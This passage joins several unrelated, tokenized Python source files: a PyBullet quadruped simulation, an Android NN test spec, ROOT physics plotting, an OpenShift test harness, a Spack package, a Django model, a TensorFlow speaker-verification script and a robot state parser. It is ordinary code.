velocityGain=kd force=maxForce)<line_sep>#stand still p.setRealTimeSimulation(useRealTime)<line_sep>t=0.0<line_sep>t_end=t+15<line_sep>ref_time=time.time()<while_stmt>(t<l>t_end)<block_start>p.setGravity(0 0 -10)<if_stmt>(useRealTime)<block_start>t=time.time()-ref_time<block_end><else_stmt><block_start>t=t+fixedTimeStep<block_end><if_stmt>(useRealTime<eq>0)<block_start>p.stepSimulation()<line_sep>time.sleep(fixedTimeStep)<block_end><block_end>print("quadruped Id = ")<line_sep>print(quadruped)<line_sep>p.saveWorld("quadru.py")<line_sep>logId=p.startStateLogging(p.STATE_LOGGING_MINITAUR "quadrupedLog.bin" [quadruped])<line_sep>#jump t=0.0<line_sep>t_end=t+100<line_sep>i=0<line_sep>ref_time=time.time()<while_stmt>(1)<block_start><if_stmt>(useRealTime)<block_start>t=time.time()-ref_time<block_end><else_stmt><block_start>t=t+fixedTimeStep<block_end><if_stmt>(<true>)<block_start>target=math.sin(t<times>speed)<times>jump_amp+1.57<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[0] controlMode=p.POSITION_CONTROL targetPosition=motordir[0]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[1] controlMode=p.POSITION_CONTROL targetPosition=motordir[1]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[2] controlMode=p.POSITION_CONTROL targetPosition=motordir[2]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[3] controlMode=p.POSITION_CONTROL targetPosition=motordir[3]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[4] controlMode=p.POSITION_CONTROL targetPosition=motordir[4]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[5] controlMode=p.POSITION_CONTROL targetPosition=motordir[5]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[6] controlMode=p.POSITION_CONTROL targetPosition=motordir[6]<times>target positionGain=kp velocityGain=kd force=maxForce)<line_sep>p.setJointMotorControl2(bodyIndex=quadruped jointIndex=legnumbering[7] controlMode=p.POSITION_CONTROL targetPosition=motordir[7]<times>target positionGain=kp velocityGain=kd force=maxForce)<block_end><if_stmt>(useRealTime<eq>0)<block_start>p.stepSimulation()<line_sep>time.sleep(fixedTimeStep)<block_end><block_end>
# # Copyright (C) 2018 The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # layout=BoolScalar("layout" <false>)# NHWC # TEST 1: SPACE_TO_BATCH_NCHW_1, block_size = [2, 2] i1=Input("op1" "TENSOR_FLOAT32" "{1, 2, 2, 2}")<line_sep>pad1=Parameter("paddings" "TENSOR_INT32" "{2, 2}" [0 0 0 0])<line_sep>o1=Output("op4" "TENSOR_FLOAT32" "{4, 1, 1, 2}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i1 [2 2] pad1 layout).To(o1)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i1:("TENSOR_QUANT8_ASYMM" 0.1 0) o1:("TENSOR_QUANT8_ASYMM" 0.1 0)})<line_sep># Instantiate an example example=Example({i1:[1.4 2.3 3.2 4.1 5.4 6.3 7.2 8.1] o1:[1.4 2.3 3.2 4.1 5.4 6.3 7.2 8.1]}).AddNchw(i1 o1 layout).AddVariations("relaxed" "float16" quant8)<line_sep># TEST 2: SPACE_TO_BATCH_NCHW_2, block_size = [2, 2] i2=Input("op1" "TENSOR_FLOAT32" "{1, 4, 4, 1}")<line_sep>o2=Output("op4" "TENSOR_FLOAT32" "{4, 2, 2, 1}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i2 [2 2] pad1 layout).To(o2)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i2:("TENSOR_QUANT8_ASYMM" 0.5 0) o2:("TENSOR_QUANT8_ASYMM" 0.5 0)})<line_sep># Instantiate an example example=Example({i2:[1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16] o2:[1 3 9 11 2 4 10 12 5 7 13 15 6 8 14 16]}).AddNchw(i2 o2 layout).AddVariations("relaxed" "float16" quant8)<line_sep># TEST 3: SPACE_TO_BATCH_NCHW_3, block_size = [3, 2] i3=Input("op1" "TENSOR_FLOAT32" "{1, 5, 2, 1}")<line_sep>pad3=Parameter("paddings" "TENSOR_INT32" "{2, 2}" [1 0 2 0])<line_sep>o3=Output("op4" "TENSOR_FLOAT32" "{6, 2, 2, 1}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i3 [3 2] pad3 layout).To(o3)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i3:("TENSOR_QUANT8_ASYMM" 0.5 128) o3:("TENSOR_QUANT8_ASYMM" 0.5 128)})<line_sep># Instantiate an example example=Example({i3:[1 2 3 4 5 6 7 8 9 10] o3:[0 0 0 5 0 0 0 6 0 1 0 7 0 2 0 8 0 3 0 9 0 4 0 10]}).AddNchw(i3 o3 layout).AddVariations("relaxed" "float16" quant8)<line_sep># TEST 4: SPACE_TO_BATCH_NCHW_4, block_size = [3, 2] i4=Input("op1" "TENSOR_FLOAT32" "{1, 4, 2, 1}")<line_sep>pad4=Parameter("paddings" "TENSOR_INT32" "{2, 2}" [1 1 2 4])<line_sep>o4=Output("op4" "TENSOR_FLOAT32" "{6, 2, 4, 1}")<line_sep>Model().Operation("SPACE_TO_BATCH_ND" i4 [3 2] pad4 layout).To(o4)<line_sep># Additional data type quant8=DataTypeConverter().Identify({i4:("TENSOR_QUANT8_ASYMM" 0.25 128) o4:("TENSOR_QUANT8_ASYMM" 0.25 128)})<line_sep># Instantiate an example example=Example({i4:[1 2 3 4 5 6 7 8] o4:[0 0 0 0 0 5 0 0 0 0 0 0 0 6 0 0 0 1 0 0 0 7 0 0 0 2 0 0 0 8 0 0 0 3 0 0 0 0 0 0 0 4 0 0 0 0 0 0]}).AddNchw(i4 o4 layout).AddVariations("relaxed" "float16" quant8)<line_sep>
#! /usr/bin/env python <import_from_stmt>ROOT TCanvas TGraphErrors TLegend TPaveText<import_from_stmt>ROOT kBlack kBlue kRed<import_from_stmt>Helper Frame ReadHistList<import_from_stmt>Graphics Style<import_from_stmt>SpectrumContainer DataContainer<import_from_stmt>copy deepcopy<class_stmt>PeriodComparisonPlot<block_start><def_stmt>__init__ self<block_start>self.__comparisons=[]<line_sep>self.__canvas=<none><line_sep>self.__frames={}<line_sep>self.__legend=<none><block_end><def_stmt>AddComparison self comp<block_start>self.__comparisons.append(comp)<block_end><def_stmt>SetPlotRange self min max<block_start><for_stmt>comp self.__comparisons<block_start>comp.SetPlotRange(min max)<block_end><block_end><def_stmt>Draw self<block_start>self.__canvas=TCanvas("comparison%s"%(self.__comparisons[0].GetTriggerName()) "Comparison of different periods for trigger %s"%(self.__comparisons[0].GetTriggerName()) 1000 600)<line_sep>self.__canvas.Divide(2 1)<line_sep>self.__legend=TLegend(0.15 0.15 0.45 0.45)<line_sep>self.__legend.SetBorderSize(0)<line_sep>self.__legend.SetFillStyle(0)<line_sep>self.__legend.SetTextFont(42)<line_sep>specpad=self.__canvas.cd(1)<line_sep>specpad.SetGrid(<false> <false>)<line_sep>specpad.SetLogx(<true>)<line_sep>specpad.SetLogy(<true>)<line_sep>self.__frames["Spectra"]=Frame("axisSpec%s"%(self.__comparisons[0].GetTriggerName()) 0 100 1e-10 100)<line_sep>self.__frames["Spectra"].SetXtitle("p_{t} (GeV/c)")<line_sep>self.__frames["Spectra"].SetYtitle("1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")<line_sep>self.__frames["Spectra"].Draw()<line_sep>self.__comparisons[0].DrawMinBiasSpectrum()<line_sep>self.__comparisons[0].AddMBtoLegend(self.__legend)<for_stmt>comp sorted(self.__comparisons)<block_start>comp.DrawTriggeredSpectrum()<line_sep>comp.AddTriggeredSpectrumToLegend(self.__legend)<block_end>self.__legend.Draw()<line_sep>self.__label=self.__comparisons[0].CreateLabel(0.5 0.75 0.89 0.85)<line_sep>self.__label.Draw()<line_sep>rpad=self.__canvas.cd(2)<line_sep>rpad.SetGrid(<false> <false>)<line_sep>self.__frames["Ratios"]=Frame("axisRatio%s"%(self.__comparisons[0].GetTriggerName()) 0 100 0 2000)<line_sep>self.__frames["Ratios"].SetXtitle("p_{t} (GeV/c)")<line_sep>self.__frames["Ratios"].SetYtitle("%s / Min. Bias"%(self.__comparisons[0].GetTriggerName()))<line_sep>self.__frames["Ratios"].Draw()<for_stmt>comp sorted(self.__comparisons)<block_start>comp.DrawRatioTriggeredMinBias()<block_end>self.__canvas.cd()<block_end><def_stmt>SaveAs self filenamebase<block_start>""" Save plot as image file """<line_sep>types=["eps" "pdf" "jpeg" "gif" "png"]<for_stmt>t types<block_start>self.__canvas.SaveAs("%s.%s"%(filenamebase t))<block_end><block_end><block_end><class_stmt>TriggerComparison<block_start><def_stmt>__init__ self trgspec mbspec triggername dataname<block_start>self.__triggeredspectrum=trgspec<line_sep>self.__minbiasspectrum=mbspec<line_sep>self.__ratiospectra=self.__triggeredspectrum.MakeRatio(self.__minbiasspectrum)<line_sep>self.__ratiospectra.SetStyle(self.__triggeredspectrum.GetStyle())<line_sep>self.__triggername=triggername<line_sep>self.__dataname=dataname<block_end><def_stmt>__cmp__ self other<block_start>othername=other.GetDataName()<if_stmt>self.__dataname<eq>othername<block_start><return>0<block_end><elif_stmt>self.__dataname<l>othername<block_start><return>-1<block_end><else_stmt><block_start><return>1<block_end><block_end><def_stmt>SetPlotRange self min max<block_start>self.__triggeredspectrum.SetPlotRange(min max)<line_sep>self.__minbiasspectrum.SetPlotRange(min max)<line_sep>self.__ratiospectra.SetPlotRange(min max)<block_end><def_stmt>GetTriggerName self<block_start><return>self.__triggername<block_end><def_stmt>GetDataName self<block_start><return>self.__dataname<block_end><def_stmt>DrawTriggeredSpectrum self<block_start>self.__triggeredspectrum.Draw()<block_end><def_stmt>DrawMinBiasSpectrum self<block_start>self.__minbiasspectrum.Draw()<block_end><def_stmt>DrawRatioTriggeredMinBias self<block_start>self.__ratiospectra.Draw()<block_end><def_stmt>AddMBtoLegend self leg<block_start>self.__minbiasspectrum.AddToLegend(leg "MinBias")<block_end><def_stmt>AddTriggeredSpectrumToLegend self leg<block_start>self.__triggeredspectrum.AddToLegend(leg self.__dataname)<block_end><def_stmt>CreateLabel self xmin ymin xmax ymax<block_start>label=TPaveText(xmin ymin xmax ymax "NDC")<line_sep>label.SetBorderSize(0)<line_sep>label.SetFillStyle(0)<line_sep>label.SetTextFont(42)<line_sep>label.AddText("Trigger: %s"%(self.__triggername))<line_sep><return>label<block_end><block_end><class_stmt>GraphicsObject<block_start><def_stmt>__init__ self data name<block_start>self._data=data<line_sep>self._graphics=<none><line_sep>self._style=Style(kBlack 20)<line_sep>self._plotrange={"Min":<none> "Max":<none>}<line_sep>self._name=name<block_end><def_stmt>SetPlotRange self min max<block_start>self._plotrange[min]=min<line_sep>self._plotrange[max]=max<block_end><def_stmt>SetStyle self style<block_start>self._style=style<block_end><def_stmt>SetName self name<block_start>self._name=name<block_end><def_stmt>GetData self<block_start><return>self._data<block_end><def_stmt>GetGraphics self<block_start><return>self._graphics<block_end><def_stmt>GetStyle self<block_start><return>self._style<block_end><def_stmt>Draw self<block_start><if_stmt><not>self._graphics<block_start>self._graphics=TGraphErrors()<line_sep>np=0<for_stmt>bin range(1 self._data.GetXaxis().GetNbins()+1)<block_start><if_stmt>self._plotrange["Min"]<and>self._data.GetXaxis().GetBinLowEdge(bin)<l>self._plotrange["Min"]<block_start><continue><block_end><if_stmt>self._plotrange["Max"]<and>self._data.GetXaxis().GetBinUpEdge(bin)<g>self._plotrange["Max"]<block_start><break><block_end>self._graphics.SetPoint(np self._data.GetXaxis().GetBinCenter(bin) self._data.GetBinContent(bin))<line_sep>self._graphics.SetPointError(np self._data.GetXaxis().GetBinWidth(bin)/2. self._data.GetBinError(bin))<line_sep>np=np+1<block_end><block_end>self._graphics.SetMarkerColor(self._style.GetColor())<line_sep>self._graphics.SetLineColor(self._style.GetColor())<line_sep>self._graphics.SetMarkerStyle(self._style.GetMarker())<line_sep>self._graphics.Draw("epsame")<block_end><def_stmt>AddToLegend self legend title=<none><block_start><if_stmt>self._graphics<block_start>tit=self._name<if_stmt>title<block_start>tit=title<block_end>legend.AddEntry(self._graphics tit "lep")<block_end><block_end><block_end><class_stmt>Spectrum(GraphicsObject)<block_start><def_stmt>__init__ self data name<block_start>GraphicsObject.__init__(self data name)<block_end><def_stmt>MakeRatio self denominator<block_start>result=deepcopy(self._data)<line_sep>result.Divide(denominator.GetData())<line_sep>ratio=Ratio(result)<if_stmt>self._plotrange["Min"]<or>self._plotrange["Max"]<block_start>ratio.SetPlotRange(self._plotrange["Min"] self._plotrange["Max"])<block_end><return>ratio<block_end><block_end><class_stmt>Ratio(GraphicsObject)<block_start><def_stmt>__init__ self data name=<none><block_start>GraphicsObject.__init__(self data name)<block_end><block_end><def_stmt>ReadSpectra filename trigger<block_start>""" Read the spectra for different trigger classes from the root file Returns a dictionary of triggers - spectrum container """<line_sep>hlist=ReadHistList(filename "PtEMCalTriggerTask")<line_sep><return>DataContainer(eventHist=hlist.FindObject("hEventHist%s"%(trigger)) trackHist=hlist.FindObject("hTrackHist%s"%(trigger)))<block_end><def_stmt>MakeNormalisedSpectrum inputdata name<block_start>""" Normalise spectrum by the number of events and by the bin width """<line_sep>inputdata.SetVertexRange(-10. 10.)<line_sep>inputdata.SetPileupRejection(<true>)<line_sep>inputdata.SelectTrackCuts(1)<line_sep><return>inputdata.MakeProjection(0 "ptSpectrum%s"%(name) "p_{t} (GeV/c)" "1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")<block_end><def_stmt>ComparePeriods filea fileb filemb namea nameb trigger<block_start>triggers={}<line_sep>dataA=ReadSpectra(filea trigger)<line_sep>dataB=ReadSpectra(fileb trigger)<line_sep>dataMB=ReadSpectra(filemb "MinBias")<line_sep>specA=Spectrum(MakeNormalisedSpectrum(dataA namea) namea)<line_sep>specA.SetStyle(Style(kBlue 24))<line_sep>specB=Spectrum(MakeNormalisedSpectrum(dataB nameb) nameb)<line_sep>specB.SetStyle(Style(kRed 25))<line_sep>specMB=Spectrum(MakeNormalisedSpectrum(dataMB "MinBias") "MinBias")<line_sep>specMB.SetStyle(Style(kBlack 25))<line_sep>plot=PeriodComparisonPlot()<line_sep>plot.AddComparison(TriggerComparison(specA specMB trigger namea))<line_sep>plot.AddComparison(TriggerComparison(specB specMB trigger nameb))<line_sep>plot.SetPlotRange(2. 100.)<line_sep>plot.Draw()<line_sep><return>plot<block_end>
<import_from_stmt>.GlobalData global_data<import_from_stmt>.utils.oc oc<import_stmt>requests<import_stmt>time<import_stmt>logging<class_stmt>App<block_start><def_stmt>__init__ self deployment project template build_config route=""<block_start>self.project=project<line_sep>self.template=template<line_sep>self.deployment=deployment<line_sep>self.build_config=build_config<line_sep>self.route=route<line_sep>self.logger=logging.getLogger('reliability')<block_end><def_stmt>build self kubeconfig<block_start>(result rc)=oc("start-build -n "+self.project+" "+self.build_config kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("build_app: Failed to create app "+self.deployment+" in project "+self.project)<line_sep><return>"App build failed for build config : "+self.build_config<block_end><else_stmt><block_start><with_stmt>global_data.builds_lock<block_start>global_data.total_build_count<augadd>1<block_end><return>"App build succeeded for build config : "+self.build_config<block_end><block_end><def_stmt>visit self<block_start>visit_success=<false><try_stmt><block_start>r=requests.get("http://"+self.route+"/")<line_sep>self.logger.info(str(r.status_code)+": visit: "+self.route)<if_stmt>r.status_code<eq>200<block_start>visit_success=<true><block_end><block_end><except_stmt>Exception<as>e<block_start>self.logger.error(f"visit: {self.route} Exception {e}")<block_end><return>visit_success<block_end><def_stmt>scale_up self kubeconfig<block_start>(result rc)=oc("scale --replicas=2 -n "+self.project+" dc/"+self.deployment kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("scale_up: Failed to scale up "+self.project+"."+self.deployment)<line_sep><return>"App scale up failed for deployment : "+self.deployment<block_end><else_stmt><block_start><return>"App scale up succeeded for deployment : "+self.deployment<block_end><block_end><def_stmt>scale_down self kubeconfig<block_start>(result rc)=oc("scale --replicas=1 -n "+self.project+" dc/"+self.deployment kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("scale_down: Failed to scale down "+self.project+"."+self.deployment)<line_sep><return>"App scale down failed for deployment : "+self.deployment<block_end><else_stmt><block_start><return>"App scale down succeeded for deployment : "+self.deployment<block_end><block_end><block_end><class_stmt>Apps<block_start><def_stmt>__init__ self<block_start>self.failed_apps=0<line_sep>self.apps={}<line_sep>self.logger=logging.getLogger('reliability')<block_end><def_stmt>add self app kubeconfig<block_start>(result rc)=oc("new-app -n "+app.project+" --template "+app.template kubeconfig)<if_stmt>rc<ne>0<block_start>self.logger.error("create_app: Failed to create app "+app.deployment+" in project "+app.project)<line_sep><return><none><block_end><else_stmt><block_start>self.apps[app.project+"."+app.deployment]=app<line_sep>(route rc)=oc("get route --no-headers -n "+app.project+" | awk {'print $2'} | grep "+app.template kubeconfig)<if_stmt>rc<eq>0<block_start>app.route=route.rstrip()<line_sep>max_tries=60<line_sep>current_tries=0<line_sep>visit_success=<false><while_stmt><not>visit_success<and>current_tries<le>max_tries<block_start>self.logger.info(app.template+" route not available yet, sleeping 10 seconds")<line_sep>time.sleep(10)<line_sep>current_tries<augadd>1<line_sep>visit_success=app.visit()<block_end><if_stmt><not>visit_success<block_start>self.failed_apps<augadd>1<line_sep>self.logger.error("add_app: "+app.project+"."+app.deployment+" did not become available")<block_end><block_end><block_end><return>app<block_end># removing an app just removes the dictionary entry, actual app removed by project deletion <def_stmt>remove self app<block_start>self.apps.pop(app.project+"."+app.deployment)<block_end><def_stmt>simulate self<block_start>apps={}<line_sep>app1=App('cakephp-mysql-example' 'cakephp-mysql-example-0' 'cakephp-mysql-example' 'cakephp-mysql-example')<line_sep>self.apps[app1.project+"."+app1.deployment]=app1<block_end># app2 = App('nodejs-mongodb-example','nodejs-mongodb-example-1','nodejs-mongodb-example','nodejs-mongodb-example') # self.apps[app2.project + "." + app2.deployment] = app2 <def_stmt>init self<block_start><pass><block_end><block_end>all_apps=Apps()<if_stmt>__name__<eq>"__main__"<block_start>app=App("cakephp-mysql-example" "t1" "cakephp-mysql-example" "cakephp-mysql-example")<line_sep>apps=Apps()<line_sep># apps.add(app) # time.sleep(180) app.visit()<line_sep>app.scale_up()<line_sep>time.sleep(30)<line_sep>app.scale_down()<line_sep>app.build()<block_end>
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) <import_from_stmt>spack *<class_stmt>Liblzf(AutotoolsPackage)<block_start>"""LibLZF is a very small data compression library. It consists of only two .c and two .h files and is very easy to incorporate into your own programs. The compression algorithm is very, very fast, yet still written in portable C."""<line_sep>homepage="http://oldhome.schmorp.de/marc/liblzf.html"<line_sep>url="http://dist.schmorp.de/liblzf/liblzf-3.6.tar.gz"<line_sep>version('3.6' sha256='9c5de01f7b9ccae40c3f619d26a7abec9986c06c36d260c179cedd04b89fb46a')<block_end>
# Django Library <import_from_stmt>django.contrib.auth.models User<import_from_stmt>django.db models<import_from_stmt>django.urls reverse<import_from_stmt>django.utils.translation ugettext_lazy<as>_<line_sep># Thirdparty Library <import_from_stmt>apps.base.models PyFather<line_sep># Tabla de Empleados <class_stmt>PyEmployee(PyFather)<block_start>name=models.CharField('Nombre' max_length=80)<line_sep>name2=models.CharField('<NAME>' max_length=80 blank=<true>)<line_sep>first_name=models.CharField('Apellido Paterno' max_length=80 blank=<true>)<line_sep>last_name=models.CharField('Apellido Materno' max_length=80 blank=<true>)<line_sep>phone=models.CharField('Teléfono' max_length=20 blank=<true>)<line_sep>email=models.CharField('Correo' max_length=40 blank=<true>)<def_stmt>get_absolute_url self<block_start><return>reverse('payroll:employee-detail' kwargs={'pk':self.pk})<block_end><def_stmt>__str__ self<block_start><return>format(self.name)<block_end><block_end>
<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_stmt>os<import_stmt>time<import_from_stmt>utils random_batch normalize similarity loss_cal optim<import_from_stmt>configuration get_config<import_from_stmt>tensorflow.contrib rnn<line_sep>config=get_config()<def_stmt>train path<block_start>tf.reset_default_graph()# reset graph # draw graph batch=tf.placeholder(shape=[<none> config.N<times>config.M 40] dtype=tf.float32)# input batch (time x batch x n_mel) lr=tf.placeholder(dtype=tf.float32)# learning rate global_step=tf.Variable(0 name='global_step' trainable=<false>)<line_sep>w=tf.get_variable("w" initializer=np.array([10] dtype=np.float32))<line_sep>b=tf.get_variable("b" initializer=np.array([-5] dtype=np.float32))<line_sep># embedding lstm (3-layer default) <with_stmt>tf.variable_scope("lstm")<block_start>lstm_cells=[tf.contrib.rnn.LSTMCell(num_units=config.hidden num_proj=config.proj)<for>i range(config.num_layer)]<line_sep>lstm=tf.contrib.rnn.MultiRNNCell(lstm_cells)# define lstm op and variables outputs,_=tf.nn.dynamic_rnn(cell=lstm inputs=batch dtype=tf.float32 time_major=<true>)# for TI-VS must use dynamic rnn embedded=outputs[-1]# the last ouput is the embedded d-vector embedded=normalize(embedded)# normalize <block_end>print("embedded size: " embedded.shape)<line_sep># loss sim_matrix=similarity(embedded w b)<line_sep>print("similarity matrix size: " sim_matrix.shape)<line_sep>loss=loss_cal(sim_matrix type=config.loss)<line_sep># optimizer operation trainable_vars=tf.trainable_variables()# get variable list optimizer=optim(lr)# get optimizer (type is determined by configuration) grads,vars=zip(*optimizer.compute_gradients(loss))# compute gradients of variables with respect to loss grads_clip,_=tf.clip_by_global_norm(grads 3.0)# l2 norm clipping by 3 grads_rescale=[0.01<times>grad<for>grad grads_clip[:2]]+grads_clip[2:]# smaller gradient scale for w, b train_op=optimizer.apply_gradients(zip(grads_rescale vars) global_step=global_step)# gradient update operation # check variables memory variable_count=np.sum(np.array([np.prod(np.array(v.get_shape().as_list()))<for>v trainable_vars]))<line_sep>print("total variables :" variable_count)<line_sep># record loss loss_summary=tf.summary.scalar("loss" loss)<line_sep>merged=tf.summary.merge_all()<line_sep>saver=tf.train.Saver()<line_sep># training session <with_stmt>tf.Session()<as>sess<block_start>tf.global_variables_initializer().run()<line_sep>os.makedirs(os.path.join(path "Check_Point") exist_ok=<true>)# make folder to save model os.makedirs(os.path.join(path "logs") exist_ok=<true>)# make folder to save log writer=tf.summary.FileWriter(os.path.join(path "logs") sess.graph)<line_sep>epoch=0<line_sep>lr_factor=1# lr decay factor ( 1/2 per 10000 iteration) loss_acc=0# accumulated loss ( for running average of loss) <for_stmt>iter range(config.iteration)# run forward and backward propagation and update parameters <block_start>_,loss_cur,summary=sess.run([train_op loss merged] feed_dict={batch:random_batch() lr:config.lr<times>lr_factor})<line_sep>loss_acc<augadd>loss_cur# accumulated loss for each 100 iteration <if_stmt>iter%10<eq>0<block_start>writer.add_summary(summary iter)# write at tensorboard <block_end><if_stmt>(iter+1)%100<eq>0<block_start>print("(iter : %d) loss: %.4f"%((iter+1) loss_acc/100))<line_sep>loss_acc=0# reset accumulated loss <block_end><if_stmt>(iter+1)%10000<eq>0<block_start>lr_factor<augdiv>2# lr decay print("learning rate is decayed! current lr : " config.lr<times>lr_factor)<block_end><if_stmt>(iter+1)%10000<eq>0<block_start>saver.save(sess os.path.join(path "./Check_Point/model.ckpt") global_step=iter<floordiv>10000)<line_sep>print("model is saved!")<block_end><block_end><block_end><block_end># Test Session <def_stmt>test path<block_start>tf.reset_default_graph()<line_sep># draw graph enroll=tf.placeholder(shape=[<none> config.N<times>config.M 40] dtype=tf.float32)# enrollment batch (time x batch x n_mel) verif=tf.placeholder(shape=[<none> config.N<times>config.M 40] dtype=tf.float32)# verification batch (time x batch x n_mel) batch=tf.concat([enroll verif] axis=1)<line_sep># embedding lstm (3-layer default) <with_stmt>tf.variable_scope("lstm")<block_start>lstm_cells=[tf.contrib.rnn.LSTMCell(num_units=config.hidden num_proj=config.proj)<for>i range(config.num_layer)]<line_sep>lstm=tf.contrib.rnn.MultiRNNCell(lstm_cells)# make lstm op and variables outputs,_=tf.nn.dynamic_rnn(cell=lstm inputs=batch dtype=tf.float32 time_major=<true>)# for TI-VS must use dynamic rnn embedded=outputs[-1]# the last ouput is the embedded d-vector embedded=normalize(embedded)# normalize <block_end>print("embedded size: " embedded.shape)<line_sep># enrollment embedded vectors (speaker model) enroll_embed=normalize(tf.reduce_mean(tf.reshape(embedded[:config.N<times>config.M :] shape=[config.N config.M -1]) axis=1))<line_sep># verification embedded vectors verif_embed=embedded[config.N<times>config.M: :]<line_sep>similarity_matrix=similarity(embedded=verif_embed w=1. b=0. center=enroll_embed)<line_sep>saver=tf.train.Saver(var_list=tf.global_variables())<with_stmt>tf.Session()<as>sess<block_start>tf.global_variables_initializer().run()<line_sep># load model print("model path :" path)<line_sep>ckpt=tf.train.get_checkpoint_state(checkpoint_dir=os.path.join(path "Check_Point"))<line_sep>ckpt_list=ckpt.all_model_checkpoint_paths<line_sep>loaded=0<for_stmt>model ckpt_list<block_start><if_stmt>config.model_num<eq>int(model.split('-')[-1])# find ckpt file which matches configuration model number <block_start>print("ckpt file is loaded !" model)<line_sep>loaded=1<line_sep>saver.restore(sess model)# restore variables from selected ckpt file <break><block_end><block_end><if_stmt>loaded<eq>0<block_start><raise>AssertionError("ckpt file does not exist! Check config.model_num or config.model_path.")<block_end>print("test file path : " config.test_path)<line_sep># return similarity matrix after enrollment and verification time1=time.time()# for check inference time <if_stmt>config.tdsv<block_start>S=sess.run(similarity_matrix feed_dict={enroll:random_batch(shuffle=<false> noise_filenum=1) verif:random_batch(shuffle=<false> noise_filenum=2)})<block_end><else_stmt><block_start>S=sess.run(similarity_matrix feed_dict={enroll:random_batch(shuffle=<false>) verif:random_batch(shuffle=<false> utter_start=config.M)})<block_end>S=S.reshape([config.N config.M -1])<line_sep>time2=time.time()<line_sep>np.set_printoptions(precision=2)<line_sep>print("inference time for %d utterences : %0.2fs"%(2<times>config.M<times>config.N time2-time1))<line_sep>print(S)# print similarity matrix # calculating EER diff=1<line_sep>EER=0<line_sep>EER_thres=0<line_sep>EER_FAR=0<line_sep>EER_FRR=0<line_sep># through thresholds calculate false acceptance ratio (FAR) and false reject ratio (FRR) <for_stmt>thres [0.01<times>i+0.5<for>i range(50)]<block_start>S_thres=S<g>thres<line_sep># False acceptance ratio = false acceptance / mismatched population (enroll speaker != verification speaker) FAR=sum([np.sum(S_thres[i])-np.sum(S_thres[i : i])<for>i range(config.N)])/(config.N-1)/config.M/config.N<line_sep># False reject ratio = false reject / matched population (enroll speaker = verification speaker) FRR=sum([config.M-np.sum(S_thres[i][: i])<for>i range(config.N)])/config.M/config.N<line_sep># Save threshold when FAR = FRR (=EER) <if_stmt>diff<g>abs(FAR-FRR)<block_start>diff=abs(FAR-FRR)<line_sep>EER=(FAR+FRR)/2<line_sep>EER_thres=thres<line_sep>EER_FAR=FAR<line_sep>EER_FRR=FRR<block_end><block_end>print("\nEER : %0.2f (thres:%0.2f, FAR:%0.2f, FRR:%0.2f)"%(EER EER_thres EER_FAR EER_FRR))<block_end><block_end>
<import_from_future_stmt> print_function<import_stmt>struct<import_stmt>copy<line_sep>#this class handles different protocol versions <class_stmt>RobotStateRT(object)<block_start>@staticmethod<def_stmt>unpack buf<block_start>rs=RobotStateRT()<line_sep>(plen ptype)=struct.unpack_from("!IB" buf)<if_stmt>plen<eq>756<block_start><return>RobotStateRT_V15.unpack(buf)<block_end><elif_stmt>plen<eq>812<block_start><return>RobotStateRT_V18.unpack(buf)<block_end><elif_stmt>plen<eq>1044<block_start><return>RobotStateRT_V30.unpack(buf)<block_end><else_stmt><block_start>print("RobotStateRT has wrong length: "+str(plen))<line_sep><return>rs<block_end><block_end><block_end>#this parses RobotStateRT for versions = v1.5 #http://wiki03.lynero.net/Technical/RealTimeClientInterface?foswiki_redirect_cache=9b4574b30760f720c6f79c5f1f2203dd <class_stmt>RobotStateRT_V15(object)<block_start>__slots__=['time' 'q_target' 'qd_target' 'qdd_target' 'i_target' 'm_target' 'q_actual' 'qd_actual' 'i_actual' 'tool_acc_values' 'unused' 'tcp_force' 'tool_vector' 'tcp_speed' 'digital_input_bits' 'motor_temperatures' 'controller_timer' 'test_value']<line_sep>@staticmethod<def_stmt>unpack buf<block_start>offset=0<line_sep>message_size=struct.unpack_from("!i" buf offset)[0]<line_sep>offset<augadd>4<if_stmt>message_size<ne>len(buf)<block_start>print(("MessageSize: " message_size "; BufferSize: " len(buf)))<line_sep><raise>Exception("Could not unpack RobotStateRT packet: length field is incorrect")<block_end>rs=RobotStateRT_V15()<line_sep>#time: 1x double (1x 8byte) rs.time=struct.unpack_from("!d" buf offset)[0]<line_sep>offset<augadd>8<line_sep>#q_target: 6x double (6x 8byte) all_values=list(struct.unpack_from("!dddddd" buf offset))<line_sep>offset<augadd>6<times>8<line_sep>rs.q_target=copy.deepcopy(all_values)<line_sep>#qd_target: 6x double (6x 8byte) 